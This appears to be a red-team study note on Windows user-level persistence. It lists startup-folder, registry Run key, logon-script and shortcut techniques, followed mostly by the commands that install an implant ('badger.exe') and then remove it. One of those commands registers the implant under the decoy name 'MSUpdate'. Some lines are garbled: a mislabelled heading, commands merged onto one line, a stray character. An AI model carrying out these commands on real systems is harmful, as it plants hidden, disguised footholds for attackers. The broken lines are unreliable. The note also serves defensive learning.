Why it matters in practice
Persistence matters because it shapes how an operator scopes the work, chooses validation steps, prioritizes evidence and explains risk. The point is not to accumulate trivia; it is to understand which control boundary is in play and how that boundary can fail under realistic pressure.
This note keeps persistence tied to offensive workflow: what to observe, what to prove, what usually goes wrong, and which references remain useful once an assessment moves from planning into active validation.
Primary coverage
The items below mark the main workflows, concepts, tools and validation themes that repeatedly matter when working through persistence.
- Persistence
- User context
- Persistence via startup folder
- Persistence via starup folder delete
- Persistence via registry run keys
- Persistence via registry run keys delete
- Persistence via logon scripts
- Logon.bat
- Persistence via logon scripts delete
- Persistence via shortcut modification
Selected public references
copy c:\tools\badger.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"
del "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\badger.exe"
reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v MSUpdate /t REG_SZ /d c:\tools\badger.exe /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v MSUpdate /f
reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /d "c:\tools\logon.bat" /t REG_SZ /f
@ECHO OFF C:\tools\badger.exe%
reg delete "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /f
wscript c:\tools\makelnk.vbs
Selected public references
- Nmap Reference Guidenmap.org/book/man.html
- BloodHound Documentationbloodhound.specterops.io/
- GitHub ยท fortra / Impacketgithub.com/fortra/impacket
- MITRE ATT&CKattack.mitre.org/